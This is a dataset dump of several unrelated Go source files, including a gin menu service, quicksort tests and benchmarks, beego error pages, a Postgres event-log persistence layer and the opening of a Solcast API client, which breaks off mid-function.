text stringlengths 11 4.05M |
|---|
package menu
import (
"errors"
"github.com/gin-gonic/gin"
"strings"
"time"
"yj-app/app/model"
menuModel "yj-app/app/model/system/menu"
userService "yj-app/app/service/system/user"
cache "yj-app/app/yjgframe/cache"
"yj-app/app/yjgframe/utils/convert"
"yj-app/app/yjgframe/utils/gconv"
"yj-app/app/yjgframe/utils/page"
)
//根据主键查询数据
// SelectRecordById looks up a single menu record (with extended fields) by its primary key.
func SelectRecordById(id int64) (*menuModel.EntityExtend, error) {
	record, err := menuModel.SelectRecordById(id)
	return record, err
}
//根据条件查询数据
// SelectListAll returns every menu entity matching the given filter parameters.
func SelectListAll(params *menuModel.SelectPageReq) ([]menuModel.Entity, error) {
	list, err := menuModel.SelectListAll(params)
	return list, err
}
//根据条件分页查询数据
// SelectListPage returns one page of menu entities plus paging metadata.
func SelectListPage(params *menuModel.SelectPageReq) (*[]menuModel.Entity, *page.Paging, error) {
	list, paging, err := menuModel.SelectListPage(params)
	return list, paging, err
}
//根据主键删除数据
// DeleteRecordById removes the menu row identified by id.
// It reports true only when the delete succeeded and affected at least one row.
func DeleteRecordById(id int64) bool {
	affected, err := (&menuModel.Entity{MenuId: id}).Delete()
	return err == nil && affected > 0
}
//添加数据
// AddSave inserts a new menu record built from the add request, stamping the
// creator from the currently logged-in user, and returns the new menu id.
func AddSave(req *menuModel.AddReq, c *gin.Context) (int64, error) {
	var entity menuModel.Entity
	entity.MenuName = req.MenuName
	entity.Visible = req.Visible
	entity.ParentId = req.ParentId
	entity.Remark = ""
	entity.MenuType = req.MenuType
	entity.Url = req.Url
	entity.Perms = req.Perms
	entity.Target = req.Target
	entity.Icon = req.Icon
	entity.OrderNum = req.OrderNum
	entity.CreateTime = time.Now()
	entity.CreateBy = ""
	// BUG fixed: the original tested `user == nil` and then dereferenced
	// user.LoginName inside the branch — a guaranteed nil-pointer panic for
	// anonymous sessions, and the creator was never recorded for real users.
	if user := userService.GetProfile(c); user != nil {
		entity.CreateBy = user.LoginName
	}
	_, err := entity.Insert()
	return entity.MenuId, err
}
//修改数据
// EditSave loads the menu identified by req.MenuId, applies the requested
// field changes, stamps the updater from the logged-in user, and persists it.
// Returns the number of affected rows.
func EditSave(req *menuModel.EditReq, c *gin.Context) (int64, error) {
	entity := &menuModel.Entity{MenuId: req.MenuId}
	ok, err := entity.FindOne()
	if err != nil {
		return 0, err
	}
	if !ok {
		// NOTE(review): message says "role does not exist" but this is the
		// menu service — confirm whether it should read "菜单不存在".
		return 0, errors.New("角色不存在")
	}
	entity.MenuName = req.MenuName
	entity.Visible = req.Visible
	entity.ParentId = req.ParentId
	entity.Remark = ""
	entity.MenuType = req.MenuType
	entity.Url = req.Url
	entity.Perms = req.Perms
	entity.Target = req.Target
	entity.Icon = req.Icon
	entity.OrderNum = req.OrderNum
	entity.UpdateTime = time.Now()
	entity.UpdateBy = ""
	// BUG fixed: the original tested `user == nil` before dereferencing
	// user.LoginName — a nil-pointer panic for anonymous sessions, and the
	// updater was never recorded for logged-in users.
	if user := userService.GetProfile(c); user != nil {
		entity.UpdateBy = user.LoginName
	}
	return entity.Update()
}
//批量删除数据记录
// DeleteRecordByIds deletes the menu rows whose ids appear in the
// comma-separated list. It returns the number of rows removed, or 0 on error.
func DeleteRecordByIds(ids string) int64 {
	idList := convert.ToInt64Array(ids, ",")
	deleted, err := menuModel.DeleteBatch(idList...)
	if err != nil {
		return 0
	}
	return deleted
}
//加载所有菜单列表树
// MenuTreeData loads every menu visible to the given user and converts the
// list into Ztree nodes (without permission decoration).
func MenuTreeData(userId int64) (*[]model.Ztree, error) {
	menuList, err := SelectMenuNormalByUser(userId)
	if err != nil {
		return nil, err
	}
	return InitZtree(menuList, nil, false)
}
//获取用户的菜单数据
// SelectMenuNormalByUser returns the menu tree for a user: administrators see
// every menu, everyone else only those granted through their roles.
func SelectMenuNormalByUser(userId int64) (*[]menuModel.EntityExtend, error) {
	if userService.IsAdmin(userId) {
		return SelectMenuNormalAll()
	}
	return SelectMenusByUserId(gconv.String(userId))
}
//获取管理员菜单数据
// SelectMenuNormalAll returns the full menu tree available to administrators.
// It serves from the process cache when possible; on a miss it loads the flat
// menu list from the database, assembles a two-level child hierarchy in place,
// and re-caches the result for one hour.
func SelectMenuNormalAll() (*[]menuModel.EntityExtend, error) {
// try the cache first
c := cache.Instance()
tmp, f := c.Get(model.MENU_CACHE)
if f && tmp != nil {
rs, ok := tmp.([]menuModel.EntityExtend)
if ok {
return &rs, nil
}
}
// cache miss: load the flat list from the database
var result []menuModel.EntityExtend
result, err := menuModel.SelectMenuNormalAll()
if err != nil {
return nil, err
}
// attach children (and grandchildren) to each node; getMenuChildPerms
// returns copies, so Target/Url defaults are applied on the copies here
for i := range result {
chilrens := getMenuChildPerms(result, result[i].MenuId)
for j := range chilrens {
chilrens2 := getMenuChildPerms(result, chilrens[j].MenuId)
chilrens[j].Children = chilrens2
if chilrens[j].Target == "" {
chilrens[j].Target = "menuItem"
}
if chilrens[j].Url == "" {
chilrens[j].Url = "#"
}
}
if chilrens != nil {
result[i].Children = chilrens
// non-root nodes get display defaults for target and URL
if result[i].ParentId != 0 {
if result[i].Target == "" {
result[i].Target = "menuItem"
}
if result[i].Url == "" {
result[i].Url = "#"
}
}
}
}
// cache the assembled tree for an hour
cache.Instance().Set(model.MENU_CACHE, result, time.Hour)
return &result, nil
}
//根据用户ID读取菜单数据
// SelectMenusByUserId returns the menu tree granted to a specific user.
// Results are cached per user (key: MENU_CACHE + userId) for one hour; on a
// miss the flat list is loaded from the database and assembled into a
// two-level hierarchy in place, mirroring SelectMenuNormalAll.
func SelectMenusByUserId(userId string) (*[]menuModel.EntityExtend, error) {
// try the per-user cache first
tmp, have := cache.Instance().Get(model.MENU_CACHE + userId)
if have && tmp != nil {
rs, ok := tmp.([]menuModel.EntityExtend)
if ok {
return &rs, nil
}
}
// cache miss: load the user's flat menu list from the database
var result []menuModel.EntityExtend
result, err := menuModel.SelectMenusByUserId(userId)
if err != nil {
return nil, err
}
for i := range result {
chilrens := getMenuChildPerms(result, result[i].MenuId)
for j := range chilrens {
chilrens2 := getMenuChildPerms(result, chilrens[j].MenuId)
chilrens[j].Children = chilrens2
if chilrens[j].Target == "" {
chilrens[j].Target = "menuItem"
}
if chilrens[j].Url == "" {
chilrens[j].Url = "#"
}
}
if chilrens != nil {
result[i].Children = chilrens
if result[i].ParentId != 0 {
// non-root nodes get display defaults
if result[i].Target == "" {
result[i].Target = "menuItem"
}
if result[i].Url == "" {
result[i].Url = "#"
}
} else {
// root nodes: clear the target when there is no real URL
if result[i].Url == "" || result[i].Url == "#" {
result[i].Target = ""
}
if result[i].Url == "" {
result[i].Url = "#"
}
}
}
}
// cache the assembled tree for this user for an hour
cache.Instance().Set(model.MENU_CACHE+userId, result, time.Hour)
return &result, nil
}
//根据父id获取子菜单
// getMenuChildPerms returns the direct children of parentId whose type is a
// directory ("M") or a component ("C").
// NOTE: it also mutates the matching entries of the input slice in place,
// defaulting Target to "menuItem" and Url to "#" before copying them out —
// callers such as SelectMenuNormalAll rely on the returned copies.
func getMenuChildPerms(menus []menuModel.EntityExtend, parentId int64) []menuModel.EntityExtend {
if menus == nil {
return nil
}
var result []menuModel.EntityExtend
// collect immediate children of parentId
for i := range menus {
if menus[i].ParentId == parentId && (menus[i].MenuType == "M" || menus[i].MenuType == "C") {
if menus[i].Target == "" {
menus[i].Target = "menuItem"
}
if menus[i].Url == "" {
menus[i].Url = "#"
}
result = append(result, menus[i])
}
}
return result
}
//检查菜单名是否唯一
// CheckMenuNameUniqueAll reports "0" when no menu under parentId already uses
// menuName, and "1" when the name is taken or the lookup fails.
func CheckMenuNameUniqueAll(menuName string, parentId int64) string {
	existing, err := menuModel.CheckMenuNameUniqueAll(menuName, parentId)
	if err != nil || (existing != nil && existing.MenuId > 0) {
		return "1"
	}
	return "0"
}
//检查菜单名是否唯一
// CheckMenuNameUnique reports "0" when menuName is unused under parentId by
// any menu other than menuId itself, and "1" otherwise (including lookup errors).
func CheckMenuNameUnique(menuName string, menuId, parentId int64) string {
	existing, err := menuModel.CheckMenuNameUniqueAll(menuName, parentId)
	if err != nil || (existing != nil && existing.MenuId > 0 && existing.MenuId != menuId) {
		return "1"
	}
	return "0"
}
//检查权限键是否唯一
// CheckPermsUniqueAll reports "0" when no menu already uses the permission
// key, and "1" when the key is taken or the lookup fails.
func CheckPermsUniqueAll(perms string) string {
	existing, err := menuModel.CheckPermsUniqueAll(perms)
	if err != nil || (existing != nil && existing.MenuId > 0) {
		return "1"
	}
	return "0"
}
//检查权限键是否唯一
// CheckPermsUnique reports "0" when the permission key is unused by any menu
// other than menuId itself, and "1" otherwise (including lookup errors).
func CheckPermsUnique(perms string, menuId int64) string {
	existing, err := menuModel.CheckPermsUniqueAll(perms)
	if err != nil || (existing != nil && existing.MenuId > 0 && existing.MenuId != menuId) {
		return "1"
	}
	return "0"
}
//根据角色ID查询菜单
// RoleMenuTreeData builds the Ztree for the role-assignment screen: every
// menu the user may see, with the role's currently granted menus pre-checked.
func RoleMenuTreeData(roleId, userId int64) (*[]model.Ztree, error) {
	menuList, err := SelectMenuNormalByUser(userId)
	if err != nil {
		return nil, err
	}
	// BUG fixed: the original shadowed err inside the roleId branch and then
	// unconditionally returned a nil error, silently discarding any failure
	// from InitZtree.
	var roleMenus *[]string
	if roleId > 0 {
		// best-effort: if the role's menu list cannot be loaded, fall back to
		// an unchecked tree (matching the original's behavior on this path)
		if roleMenuList, rerr := menuModel.SelectMenuTree(roleId); rerr == nil && roleMenuList != nil {
			roleMenus = &roleMenuList
		}
	}
	result, err := InitZtree(menuList, roleMenus, true)
	if err != nil {
		return nil, err
	}
	return result, nil
}
//对象转菜单树
// InitZtree converts a menu list into Ztree nodes. When roleMenuList is
// non-empty, nodes whose "<menuId><perms>" key appears in it are marked
// checked. permsFlag controls the display styling of node names.
func InitZtree(menuList *[]menuModel.EntityExtend, roleMenuList *[]string, permsFlag bool) (*[]model.Ztree, error) {
	var nodes []model.Ztree
	checkEnabled := roleMenuList != nil && len(*roleMenuList) > 0
	for _, menu := range *menuList {
		node := model.Ztree{
			Title: menu.MenuName,
			Id:    menu.MenuId,
			Name:  transMenuName(menu.MenuName, permsFlag),
			Pid:   menu.ParentId,
		}
		if checkEnabled {
			key := gconv.String(menu.MenuId) + menu.Perms
			for _, granted := range *roleMenuList {
				if strings.Compare(granted, key) == 0 {
					node.Checked = true
					break
				}
			}
		}
		nodes = append(nodes, node)
	}
	return &nodes, nil
}
// transMenuName returns the menu name for display; when permsFlag is set the
// name is wrapped in a grey font tag for the permission tree.
func transMenuName(menuName string, permsFlag bool) string {
	if !permsFlag {
		return menuName
	}
	return "<font color=\"#888\"> " + menuName + "</font>"
}
|
package quicksort
import (
"testing"
)
// TestPartition logs the pivot index chosen for a small fixed slice.
func TestPartition(t *testing.T) {
	data := []int{1, 2, 5, 4, 3}
	t.Log(partition(data, 0, len(data)-1))
}
// TestSort sorts a fixed slice and verifies the result is non-decreasing.
// (The original only logged the slice without asserting anything.)
func TestSort(t *testing.T) {
	a := []int{2, 8, 7, 1, 3, 5, 6, 4}
	sort(a, 0, len(a)-1)
	for i := 1; i < len(a); i++ {
		if a[i-1] > a[i] {
			t.Fatalf("not sorted: %v", a)
		}
	}
	t.Log(a)
}
// Benchmark1 measures sorting an already-sorted input. The input is copied
// fresh each iteration so every run sorts the same data (the original sorted
// the slice in place, so this is done for consistency with Benchmark2/3).
func Benchmark1(b *testing.B) {
	src := []int{1, 2, 3, 4, 5, 6, 7, 8}
	a := make([]int, len(src))
	for i := 0; i < b.N; i++ {
		copy(a, src)
		sort(a, 0, len(a)-1)
	}
}
// Benchmark2 measures sorting a shuffled input. BUG fixed: the original
// sorted the same slice in place, so every iteration after the first
// benchmarked already-sorted data; the input is now restored each iteration.
func Benchmark2(b *testing.B) {
	src := []int{2, 8, 7, 1, 3, 5, 6, 4}
	a := make([]int, len(src))
	for i := 0; i < b.N; i++ {
		copy(a, src)
		sort(a, 0, len(a)-1)
	}
}
// Benchmark3 measures sorting a reverse-ordered input. BUG fixed: the
// original sorted the same slice in place, so every iteration after the first
// benchmarked already-sorted data; the input is now restored each iteration.
func Benchmark3(b *testing.B) {
	src := []int{9, 8, 7, 6, 5, 4, 3, 2}
	a := make([]int, len(src))
	for i := 0; i < b.N; i++ {
		copy(a, src)
		sort(a, 0, len(a)-1)
	}
}
|
package controllers
import "github.com/astaxie/beego"
// ErrorController renders the application's error pages; it inherits the
// shared request handling of IndexController via embedding.
type ErrorController struct {
IndexController
}
// Error404 renders the not-found page, echoing the requested URI.
func (c *ErrorController) Error404() {
	c.TplName = "error/404.html"
	c.Data["Path"] = c.Ctx.Request.RequestURI
}
// Error500 renders the generic error page for internal server errors.
func (c *ErrorController) Error500() {
	c.TplName = "error/error.html"
	c.Data["Title"] = "500 Internal Server Error"
	c.Data["Info"] = "服务器娘你在干嘛,不要停下来啊"
}
// Error503 renders the generic error page when the service is unavailable.
func (c *ErrorController) Error503() {
	c.TplName = "error/error.html"
	c.Data["Title"] = "503 Service Unavailable"
	c.Data["Info"] = "唔,服务器娘现在忙不过来啦,请稍后尝试QAQ"
}
// Error403 renders the generic error page for forbidden requests.
func (c *ErrorController) Error403() {
	c.TplName = "error/error.html"
	c.Data["Title"] = "403 Forbidden"
	c.Data["Info"] = "服务器娘正在维护或者其他原因无法访问QAQ"
}
func CheckError(err error) bool {
if err != nil {
beego.Error(err)
return true
}else{
return false
}
} |
package persistence
import (
"database/sql"
"encoding/json"
"fmt"
"time"
"github.com/dollarshaveclub/acyl/pkg/models"
"github.com/dollarshaveclub/metahelm/pkg/metahelm"
"github.com/google/uuid"
"github.com/lib/pq"
"github.com/pkg/errors"
)
// GetEventLogByID returns a single EventLog by id, or nil or error
// GetEventLogByID returns a single EventLog by id, or nil when no row matches.
func (pg *PGLayer) GetEventLogByID(id uuid.UUID) (*models.EventLog, error) {
	elog := &models.EventLog{}
	query := `SELECT ` + elog.Columns() + ` FROM event_logs WHERE id = $1;`
	err := pg.db.QueryRow(query, id).Scan(elog.ScanValues()...)
	switch {
	case err == sql.ErrNoRows:
		return nil, nil
	case err != nil:
		return nil, errors.Wrap(err, "error getting event log by id")
	}
	return elog, nil
}
// GetEventLogByDeliveryID returns the EventLog with the given GitHub delivery
// id, or nil when no row matches.
func (pg *PGLayer) GetEventLogByDeliveryID(deliveryID uuid.UUID) (*models.EventLog, error) {
	elog := &models.EventLog{}
	query := `SELECT ` + elog.Columns() + ` FROM event_logs WHERE github_delivery_id = $1;`
	err := pg.db.QueryRow(query, deliveryID).Scan(elog.ScanValues()...)
	switch {
	case err == sql.ErrNoRows:
		return nil, nil
	case err != nil:
		return nil, errors.Wrap(err, "error getting event log by delivery id")
	}
	return elog, nil
}
// GetEventLogsByEnvName gets all EventLogs associated with an environment
// GetEventLogsByEnvName gets all EventLogs associated with an environment.
// It unnests the environment's event_ids array and joins against event_logs.
func (pg *PGLayer) GetEventLogsByEnvName(name string) ([]models.EventLog, error) {
q := `SELECT qa_environment_event_ids.event_id, ` + models.EventLog{}.ColumnsWithoutID() + ` FROM (
SELECT unnest(event_ids) AS event_id FROM qa_environments WHERE name = $1
) AS qa_environment_event_ids
JOIN event_logs ON qa_environment_event_ids.event_id = event_logs.id`
return collectEventLogRows(pg.db.Query(q, name))
}
// GetEventLogsByRepoAndPR gets all EventLogs associated with a repo and PR, sorted in reverse created order (newest first)
// GetEventLogsByRepoAndPR gets all EventLogs associated with a repo and PR,
// sorted in reverse created order (newest first).
func (pg *PGLayer) GetEventLogsByRepoAndPR(repo string, pr uint) ([]models.EventLog, error) {
	query := `SELECT ` + models.EventLog{}.Columns() + ` FROM event_logs WHERE repo = $1 AND pull_request = $2 ORDER BY created DESC;`
	rows, err := pg.db.Query(query, repo, pr)
	return collectEventLogRows(rows, err)
}
// CreateEventLog creates a new EventLog. If elog.EnvName is an empty string, null will be persisted in the database for that column.
// CreateEventLog creates a new EventLog. If elog.EnvName is an empty string,
// null will be persisted in the database for that column.
func (pg *PGLayer) CreateEventLog(elog *models.EventLog) error {
	// Assign a random log key when the caller did not provide one.
	if elog.LogKey == uuid.Nil {
		key, err := uuid.NewRandom()
		if err != nil {
			return errors.Wrap(err, "error generating log key")
		}
		elog.LogKey = key
	}
	query := `INSERT INTO event_logs (` + elog.InsertColumns() + `) VALUES (` + elog.InsertParams() + `);`
	_, err := pg.db.Exec(query, elog.InsertValues()...)
	return errors.Wrap(err, "error inserting event log")
}
// AppendToEventLog appends a new log line to an EventLog
// AppendToEventLog appends a new log line to an EventLog's log array.
func (pg *PGLayer) AppendToEventLog(id uuid.UUID, msg string) error {
	query := `UPDATE event_logs SET log = array_append(log, $1) WHERE id = $2;`
	_, err := pg.db.Exec(query, msg, id)
	return errors.Wrap(err, "error appending to event log")
}
// SetEventLogEnvName sets the env name for an EventLog
// The name must be valid and exist in qa_environments or the foreign key will cause this method to return an error
// SetEventLogEnvName sets the env name for an EventLog
// The name must be valid and exist in qa_environments or the foreign key will cause this method to return an error
func (pg *PGLayer) SetEventLogEnvName(id uuid.UUID, name string) error {
tx, err := pg.db.Begin()
if err != nil {
return errors.Wrap(err, "error beginning transaction")
}
// rollback is a no-op once Commit has succeeded
defer tx.Rollback()
q := `UPDATE event_logs SET env_name = $1 WHERE id = $2;`
if _, err := tx.Exec(q, name, id); err != nil {
return errors.Wrap(err, "error setting eventlog env name")
}
// append the event id to the environment's event_ids array, skipping
// duplicates via the NOT ... = ANY(event_ids) guard
q = `UPDATE qa_environments SET event_ids = event_ids || $1::uuid WHERE name = $2 AND NOT $1::uuid = ANY(event_ids);`
if _, err := tx.Exec(q, id, name); err != nil {
return errors.Wrap(err, "error setting environment event IDs")
}
if err := tx.Commit(); err != nil {
return errors.Wrap(err, "error committing transaction")
}
return nil
}
// DeleteEventLog deletes an EventLog
// DeleteEventLog deletes a single EventLog by id.
func (pg *PGLayer) DeleteEventLog(id uuid.UUID) error {
	query := `DELETE FROM event_logs WHERE id = $1;`
	_, err := pg.db.Exec(query, id)
	return errors.Wrap(err, "error deleting event log")
}
// DeleteEventLogsByEnvName deletes all EventLogs associated with an environment and returns the number of EventLogs deleted, or error
// DeleteEventLogsByEnvName deletes all EventLogs associated with an
// environment and returns the number of EventLogs deleted, or error.
func (pg *PGLayer) DeleteEventLogsByEnvName(name string) (uint, error) {
	q := `DELETE FROM event_logs WHERE env_name = $1;`
	res, err := pg.db.Exec(q, name)
	if err != nil {
		// BUG fixed: the original called res.RowsAffected() before checking
		// err — res is nil when Exec fails, which panics.
		return 0, errors.Wrap(err, "error deleting event logs by env name")
	}
	n, _ := res.RowsAffected()
	return uint(n), nil
}
// DeleteEventLogsByRepoAndPR deletes all EventLogs associated with a repo and PR and returns the number of EventLogs deleted, or error
// DeleteEventLogsByRepoAndPR deletes all EventLogs associated with a repo and
// PR and returns the number of EventLogs deleted, or error.
func (pg *PGLayer) DeleteEventLogsByRepoAndPR(repo string, pr uint) (uint, error) {
	q := `DELETE FROM event_logs WHERE repo = $1 AND pull_request = $2;`
	res, err := pg.db.Exec(q, repo, pr)
	if err != nil {
		// BUG fixed: the original called res.RowsAffected() before checking
		// err — res is nil when Exec fails, which panics.
		return 0, errors.Wrap(err, "error deleting event logs by repo and pr")
	}
	n, _ := res.RowsAffected()
	return uint(n), nil
}
// collectEventLogRows scans every row of a query result into EventLog values.
// It accepts the (rows, err) pair straight from db.Query so callers can chain
// the two calls.
func collectEventLogRows(rows *sql.Rows, err error) ([]models.EventLog, error) {
	if err != nil {
		if err == sql.ErrNoRows {
			return nil, nil
		}
		// was errors.Wrapf with no format args; Wrap is the right call
		return nil, errors.Wrap(err, "error querying")
	}
	defer rows.Close()
	var logs []models.EventLog
	for rows.Next() {
		el := models.EventLog{}
		if err := rows.Scan(el.ScanValues()...); err != nil {
			return nil, errors.Wrap(err, "error scanning row")
		}
		logs = append(logs, el)
	}
	// BUG fixed: iteration errors (e.g. a connection dropped mid-stream) were
	// silently discarded without this check.
	if err := rows.Err(); err != nil {
		return nil, errors.Wrap(err, "error iterating rows")
	}
	return logs, nil
}
func JSONTime(t time.Time) string {
return t.Format("2006-01-02T15:04:05Z07:00")
}
// SetEventStatus replaces the entire status document for an event.
func (pg *PGLayer) SetEventStatus(id uuid.UUID, status models.EventStatusSummary) error {
	query := `UPDATE event_logs SET status = $1 WHERE id = $2;`
	_, err := pg.db.Exec(query, status, id)
	return errors.Wrap(err, "error setting event status")
}
// SetEventStatusConfig merges the config processing duration and the ref map
// into the status->config JSONB document for the given event.
func (pg *PGLayer) SetEventStatusConfig(id uuid.UUID, processingTime time.Duration, refmap map[string]string) error {
if len(refmap) == 0 {
return errors.New("refmap cannot be empty")
}
rj, err := json.Marshal(&refmap)
if err != nil {
return errors.Wrap(err, "error marshaling refmap")
}
ptj, err := json.Marshal(&models.ConfigProcessingDuration{Duration: processingTime})
if err != nil {
return errors.Wrap(err, "error marshaling processingTime")
}
// jsonb_set merges the new keys into the existing config object
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('processing_time', $1::text, 'ref_map', $2::jsonb)::jsonb)
WHERE id = $3;`
_, err = pg.db.Exec(q, string(ptj), string(rj), id)
return errors.Wrap(err, "error setting event status config")
}
// SetEventStatusConfigK8sNS records the Kubernetes namespace in the
// status->config JSONB document for the given event.
func (pg *PGLayer) SetEventStatusConfigK8sNS(id uuid.UUID, ns string) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('k8s_ns', $1::text)::jsonb)
WHERE id = $2;`
_, err := pg.db.Exec(q, ns, id)
return errors.Wrap(err, "error setting event status config k8s namespace")
}
// SetEventStatusRenderedStatus stores the rendered status under
// status->config->rendered_status for the given event.
func (pg *PGLayer) SetEventStatusRenderedStatus(id uuid.UUID, rstatus models.RenderedEventStatus) error {
j, err := json.Marshal(rstatus)
if err != nil {
return errors.Wrap(err, "error marshaling rendered event status")
}
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config,rendered_status}', $1::jsonb)
WHERE id = $2;`
_, err = pg.db.Exec(q, string(j), id)
return errors.Wrap(err, "error setting event status rendered status")
}
// SetEventStatusTree replaces the status->tree JSONB document for the given
// event with the supplied node map. The map must be non-empty.
func (pg *PGLayer) SetEventStatusTree(id uuid.UUID, tree map[string]models.EventStatusTreeNode) error {
if len(tree) == 0 {
return errors.New("tree cannot be empty")
}
tj, err := json.Marshal(&tree)
if err != nil {
return errors.Wrap(err, "error marshaling tree")
}
q := `UPDATE event_logs SET
status = jsonb_set(status, '{tree}', $1::jsonb)
WHERE id = $2;`
_, err = pg.db.Exec(q, string(tj), id)
return errors.Wrap(err, "error setting event status tree")
}
// SetEventStatusCompleted records the final config status and the completion
// timestamp (UTC, RFC 3339) in the status->config document.
func (pg *PGLayer) SetEventStatusCompleted(id uuid.UUID, configStatus models.EventStatus) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('status', $1::int, 'completed', $2::text)::jsonb)
WHERE id = $3;`
_, err := pg.db.Exec(q, configStatus, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status config status to completed")
}
// SetEventStatusFailed will set the event status to indicate that it has failed and will persist the ChartError.
// SetEventStatusFailed will set the event status to indicate that it has failed and will persist the ChartError.
func (pg *PGLayer) SetEventStatusFailed(id uuid.UUID, ce metahelm.ChartError) error {
encodedChartErr, err := json.Marshal(ce)
if err != nil {
return errors.Wrap(err, "error marshaling chart error")
}
status := models.FailedStatus
// NOTE(review): the placeholders are out of order on purpose — $4 carries
// failed_resources while $3 is the id in the WHERE clause; the Exec args
// below (status, timestamp, id, chart error) line up with $1..$4. Confirm
// before "fixing" the ordering.
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('status', $1::int, 'completed', $2::text, 'failed_resources', $4::jsonb)::jsonb)
WHERE id = $3;`
_, err = pg.db.Exec(q, status, JSONTime(time.Now().UTC()), id, encodedChartErr)
return errors.Wrap(err, "error setting event status config status to failed")
}
// SetEventStatusImageStarted stamps the started time (UTC, RFC 3339) on the
// image entry of the named tree node in the status document.
func (pg *PGLayer) SetEventStatusImageStarted(id uuid.UUID, name string) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'image'], status->'tree'->$1->'image' || json_build_object('started', $2::text)::jsonb)
WHERE id = $3;`
_, err := pg.db.Exec(q, name, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status image to started")
}
// SetEventStatusImageCompleted stamps the completed time and error flag on
// the image entry of the named tree node in the status document.
// (err here is the build outcome flag, not a Go error; $2 is the flag and $3
// the timestamp, matching the arg order below.)
func (pg *PGLayer) SetEventStatusImageCompleted(id uuid.UUID, name string, err bool) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'image'], status->'tree'->$1->'image' || json_build_object('completed', $3::text, 'error', $2::boolean)::jsonb)
WHERE id = $4;`
_, err2 := pg.db.Exec(q, name, err, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err2, "error setting event status image status to completed")
}
// SetEventStatusChartStarted records the chart status and started time on the
// chart entry of the named tree node in the status document.
func (pg *PGLayer) SetEventStatusChartStarted(id uuid.UUID, name string, status models.NodeChartStatus) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'chart'], status->'tree'->$1->'chart' || json_build_object('status', $2::int, 'started', $3::text)::jsonb)
WHERE id = $4;`
_, err := pg.db.Exec(q, name, status, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status chart status to started")
}
// SetEventStatusChartCompleted records the chart status and completed time on
// the chart entry of the named tree node in the status document.
func (pg *PGLayer) SetEventStatusChartCompleted(id uuid.UUID, name string, status models.NodeChartStatus) error {
	q := `UPDATE event_logs SET
	status = jsonb_set(status, ARRAY['tree',$1,'chart'], status->'tree'->$1->'chart' || json_build_object('status', $2::int, 'completed', $3::text)::jsonb)
	WHERE id = $4;`
	_, err := pg.db.Exec(q, name, status, JSONTime(time.Now().UTC()), id)
	if err != nil {
		// BUG fixed: the original used a bare err.(*pq.Error) assertion,
		// which panics for non-pq errors (e.g. driver.ErrBadConn). This
		// debug detail dump now only fires for genuine pq errors.
		if perr, ok := err.(*pq.Error); ok {
			fmt.Printf("perr: %v\n", perr.Detail)
		}
	}
	return errors.Wrap(err, "error setting event status chart status to completed")
}
// GetEventStatus returns the status column for an event, or nil if the event
// does not exist.
func (pg *PGLayer) GetEventStatus(id uuid.UUID) (*models.EventStatusSummary, error) {
out := &models.EventStatusSummary{}
q := `SELECT status FROM event_logs WHERE id = $1;`
// NOTE(review): Scan receives &out (a **EventStatusSummary) — every other
// query in this file scans into the value/pointer directly. Confirm this
// shouldn't be Scan(out); the extra indirection likely bypasses the type's
// sql.Scanner implementation.
if err := pg.db.QueryRow(q, id).Scan(&out); err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, errors.Wrap(err, "error getting event status by id")
}
return out, nil
}
|
package query
import (
"github.com/gin-gonic/gin"
"sub_account_service/number_server/routers/query/api"
)
// InitRouter builds the gin engine for the query service, wiring the standard
// logging and panic-recovery middleware and registering its read endpoints.
func InitRouter() *gin.Engine {
	engine := gin.New()
	engine.Use(gin.Logger(), gin.Recovery())
	engine.GET("/orders/batch", api.BatchGetOrderList)
	engine.GET("/getLatestVersion", api.GetLatestVersion)
	return engine
}
|
package keeper
import (
"github.com/BitCannaGlobal/testnet-bcna-cosmos/x/bcna/types"
)
// Compile-time assertion that Keeper satisfies the module's QueryServer interface.
var _ types.QueryServer = Keeper{}
|
package solcast
import (
datatypes "github.com/Siliconrob/solcast-go/solcast/types"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"math"
"net/http"
"strconv"
"time"
"github.com/jimlawless/whereami"
"github.com/google/go-querystring/query"
"github.com/pkg/errors"
"github.com/vardius/worker-pool"
"runtime"
"sync"
)
// HttpResponse bundles a request URL with its response (or error).
type HttpResponse struct {
url string
response *http.Response
err error
}
// round returns num rounded half away from zero to the nearest integer.
func round(num float64) int {
	offset := math.Copysign(0.5, num)
	return int(num + offset)
}
// toFixed rounds num to the given number of decimal places.
func toFixed(num float64, precision int) float64 {
	scale := math.Pow(10, float64(precision))
	return float64(round(num*scale)) / scale
}
// toString formats num with exactly precision decimal places.
func toString(num float64, precision int) string {
	return strconv.FormatFloat(toFixed(num, precision), 'f', precision, 64)
}
// textAsInt parses inputText as a base-10 int64; an empty string yields 0.
// It panics on malformed input, matching the fail-fast style of this package.
func textAsInt(inputText string) int64 {
	if inputText == "" {
		return 0
	}
	parsed, err := strconv.ParseInt(inputText, 10, 64)
	if err != nil {
		panic(err)
	}
	return parsed
}
// getApiRateLimits extracts rate-limit metadata from a 429 response's
// x-rate-limit headers; for any other status it returns a zero ApiLimits.
func getApiRateLimits(resp *http.Response) ApiLimits {
results := ApiLimits{}
if resp.StatusCode != 429 {
return results
}
results.Limit = textAsInt(resp.Header.Get("x-rate-limit"))
results.Remaining = textAsInt(resp.Header.Get("x-rate-limit-remaining"))
// the reset header carries a Unix timestamp in seconds
parsedTime := textAsInt(resp.Header.Get("x-rate-limit-reset"))
if parsedTime > 0 {
results.ResetTime = time.Unix(parsedTime, 0)
}
return results
}
// getData performs an HTTP GET against the Solcast API and returns the
// response body. 4xx responses (including 429 rate limiting) and 5xx
// responses are returned as errors; transport failures panic, matching the
// package's fail-fast style.
func getData(url string) ([]byte, error) {
	netClient := &http.Client{
		Timeout: time.Minute * 5,
	}
	resp, err := netClient.Get(url)
	if err != nil {
